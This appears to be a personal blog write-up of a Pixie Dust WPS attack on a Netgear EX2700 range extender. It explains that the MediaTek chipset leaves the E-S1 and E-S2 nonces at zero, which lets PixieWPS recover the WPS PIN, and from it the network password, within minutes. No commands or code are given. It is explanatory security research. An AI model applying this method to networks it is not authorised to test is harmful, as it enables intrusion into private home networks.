WPS Attack - PixieDust

I have been gifted this Netgear EX2700 customer appliance that is designed to act as a wireless extender to your wireless network. Its primary use is to extend the signal range to cover any WiFi dead spots in your house, naturally. It works in a bridged mode alongside with your wireless router. " wireless range extender takes an existing signal from a wireless router or wireless access point and rebroadcasts it to create a second network. When two or more hosts have to be connected with one another over the IEEE 802.11 protocol and the distance is too long for a direct connection to be established, a wireless repeater is used to bridge the gap." wikipedia This model comes with MediaTek MT7620A chipset, has been released to the market in July 2014, produced by Mediatek in partnership with Ralink ( acquired by Mediatek in 2011).

EX2700, still sold by Netgear under the product line of "Essentials", is essentially a backdoor to a home network if WPS PIN is enabled and the software not updated - a convenient entry point to a home network, that intruders can exploit. Due to vulnerability of its WiFi SoC chipset MediaTek MT7620A that controls the behaviour of the device itself, the attacker can obtain WPS Pin to the EX2700 in a matter of minutes and in consequence retrieve PSK password to the network. More on this later....

"A system on a chip or system on chip (SoC or SOC) is an integrated circuit (also known as an "IC" or "chip") that integrates all components of a computer or other electronic systems. These components typically include a central processing unit (CPU), memory, input/output ports and secondary storage – all on a single substrate. It may contain digital, analog, mixed-signal, and often radio-frequency functions, depending on the application. SoCs are very common in the mobile computing market because of their low power consumption" Think Raspberry Pi! Vulnerability! This device, among many, many others ( https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit#gid=2048815923 ) when used with WPS functionality is susceptible to a Pixie Dust attack - an offline, brute forcing method that captures E-S1 and E-S2 messages during WPS exchange. PixieDust gets that information from M3 message.

Link to a research from 2014 by Dominique Bongard This attack in most cases is possible due to low entropy - an algorithm responsible for generating a supposedly "random" E-S1 and E-S2 numbers used to secure the whole process. In EX2700, situation is less secure as those numbers do not seem to be generated at all, they are all equal 0. This overlook in the design of the WPS exchange process results on an instant recovery of the router PIN.

PixieWPS cracking the PIN in less than a minute.